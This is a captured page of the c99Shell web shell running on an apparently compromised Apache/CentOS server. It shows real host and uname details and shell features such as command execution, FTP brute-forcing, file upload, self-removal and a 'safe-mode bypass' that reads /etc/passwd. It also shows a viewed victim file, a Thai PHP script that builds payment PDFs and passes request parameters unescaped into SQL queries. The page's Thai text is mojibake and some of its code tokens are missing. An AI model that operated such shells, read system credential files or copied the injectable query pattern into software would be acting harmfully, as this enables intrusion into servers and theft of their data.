!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/person/   drwxr-xr-x
Free 51.01 GB of 127.8 GB (39.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     prePrintMoneyFormPDF-3.php (5.45 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
//PDF USING MULTIPLE PAGES
//FILE CREATED BY: Carlos José Vásquez Sáez
//YOU CAN CONTACT ME: carlos@magallaneslibre.com
//FROM PUNTA ARENAS, MAGALLANES
//INOVO GROUP - http://www.inovo.cl


        /**  Configuration  */
        
require_once( "../configuration.php" );
        require_once( 
$_Config_absolute_path "/includes/connMySQL.class.php");    
        require(
'../fpdf/fpdf.php');

            
        
/**  Create Database Object  */
        
$dbObj = new DBConn;

        
/**  Config Table for This Page  */
        
$myTable "personal_tb";
        
$myTable1 "budget_year_tb"
        
$myTable2 ="durable_type_tb";
      
        
/*----- personal_tb--------*/
       
$query "SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId   LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code  LEFT JOIN  training_tb ON  personal_tb.Teacher_code = training_tb.Teacher_code   LEFT JOIN  formaoffice  ON   training_tb.Teacher_code = formaoffice.Teacher_code    WHERE   training_tb.Teacher_code = '".$_REQUEST["Teacher_code"]." '  and   training_tb.Training_code = '".$_REQUEST["Training_code"]." '  and  formaoffice.codeId = '".$_REQUEST["codeId"]." '       ";
    
$result $dbObj->execQuery($query);
    
$rss $dbObj->fetchArray($result);    

        
        
$query "SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId   LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code  LEFT JOIN  training_tb ON  personal_tb.Teacher_code = training_tb.Teacher_code   LEFT JOIN  formaoffice  ON   training_tb.Teacher_code = formaoffice.Teacher_code   LEFT JOIN  formofficemoney ON    formaoffice.codeId = formofficemoney.codeId   WHERE   formofficemoney.maNo = '".$_REQUEST["maNo"]." '  and   formofficemoney.Teacher_code = '".$_REQUEST["Flag"]." '  Group  By   formofficemoney.maNo ,  formofficemoney.Flag ";
        
$result5 $dbObj->execQuery($query);
        
$rss5 $dbObj->fetchArray($result5);    
        

$query3 "Select * From  college Where collegeStatus ='1'";
$result3 $dbObj->execQuery($query3);
$rs3 $dbObj->fetchArray($result3);

$query4 "SELECT *, prefixName as First_name FROM personal_tb LEFT JOIN prefix ON personal_tb.First_name = prefix.prefixId LEFT JOIN position_tb ON personal_tb.PositionId = position_tb.PositionId LEFT JOIN faculty_tb ON personal_tb.Faculty_code = faculty_tb.Faculty_code Where personal_tb.Faculty_code = '".$rs['Faculty_code']."' and personal_tb.TeacherId = '1'";
$result4 $dbObj->execQuery($query4);
$rs4 $dbObj->fetchArray($result4);    

function 
readNumber($number$len) {
    if(
$number=='0') { $number ""; }
    else if(
$number=='1') {
        if(
$len==2) { $number ""; }
        else { 
$number "˹Öè§"; }
    }
    else if(
$number=='2') { 
        if(
$len==2) { $number "ÂÕè"; }
        else { 
$number "Êͧ"; }
    }
    else if(
$number=='3') { $number "ÊÒÁ"; }
    else if(
$number=='4') { $number "ÊÕè"; }
    else if(
$number=='5') { $number "ËéÒ"; }
    else if(
$number=='6') { $number "Ë¡"; }
    else if(
$number=='7') { $number "à¨ç´"; }
    else if(
$number=='8') { $number "á»´"; }
    else if(
$number=='9') { $number "à¡éÒ"; }
    return 
$number;
}

function 
readUnit($len) {
    if(
$len=='1') { $len ""; }
    else if(
$len=='2') { $len "ÊÔº"; }
    else if(
$len=='3') { $len "ÃéÍÂ"; }
    else if(
$len=='4') { $len "¾Ñ¹"; }
    else if(
$len=='5') { $len "ËÁ×è¹"; }
    else if(
$len=='6') { $len "áʹ"; }
    else if(
$len=='7') { $len "ÅéÒ¹"; }
    return 
$len;
}

function 
convertNumberToString($amount) {
    list(
$baht$satang) = split('[.]'$amount);
    while(
strlen($satang) < 2)
        
$satang .= '0';
        
    
$str "";
    
$len strlen($baht);
    
$i 0;
    while(
$i <= strlen($baht)) {
        if(
$len==&& $baht[$i-1]!=&& $baht[$i]==1)
            
$str .= "àÍç´";
        else
            
$str .= readNumber($baht[$i], $len);
        if(
$baht[$i] != 0)
            
$str .= readUnit($len);
        
$len--;
        
$i++;
    }
    if(
$str != "")
        
$str .= "ºÒ·";
    
    
$len strlen($satang);
    
$i 0;
    while(
$i <= strlen($satang)) {
        if(
$len==&& $satang[$i-1]!=&& $satang[$i]==1)
            
$str .= "àÍç´";
        else
            
$str .= readNumber($satang[$i], $len);
        if(
$satang[$i] != 0)
            
$str .= readUnit($len);
        
$len--;
        
$i++;
    }
    if(
$satang != '00')
        
$str .= "ʵҧ¤ì";
    return 
$str;
}
//----------------------------------------

//Create new pdf file
$pdf = new FPDF();

//Set thai font
$pdf->SetThaiFont();

$pdf->AddPage();

//-- Load Form Image to Background
$pdf->Image('../form/FormMoney-3.jpg'00210297);

//-- Set Font
$pdf->SetFont('AngsanaNew','',13);

$pdf->Text(90,46,$rs3['collegeName']);

//-- Body ª×èÍ µÓá˹觠¼ÙéÃѺà§Ô¹
if(!empty($rss5['First_name'])){
        
$pdf->SetXY(40,235.5);
        
$pdf->Cell(73,5,$rss5['First_name'].'  '.$rss5['Teacher_name'].'  '.$rss5['Teacher_lastname'],0,0,'C');
}
if(!empty(
$rss5['Position_name'])){
        
$pdf->SetXY(130,235,5);
        
$pdf->Cell(73,5,$rss5['Position_name'],0,0,'C');
}

//  ÃÇÁ·Ñé§ÊÔé¹
$sql1 " SELECT SUM(Budget_use)  AS SumB5  FROM  formofficemoney  WHERE  Flag='$Flag'   and  maNo='$maNo'  ";
$result1 mysql_query($sql1);
$rss1 mysql_fetch_array($result1);

//  ¨Ó¹Ç¹à§Ô¹ (µÑÇÍÑ¡ÉÃ)
if(!empty($rss1['SumB5'])){
    
$SumB5 convertNumberToString($rss1['SumB5']);
    
$pdf->SetXY(50,228.5);
    
$pdf->Cell(55,5,$SumB5,0,0,'C');
}
else{
    
$pdf->SetXY(60,203);
    
$pdf->Cell(45,5,'-',0,0,'C');
}

//Create file
$pdf->Output();
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.035 ]--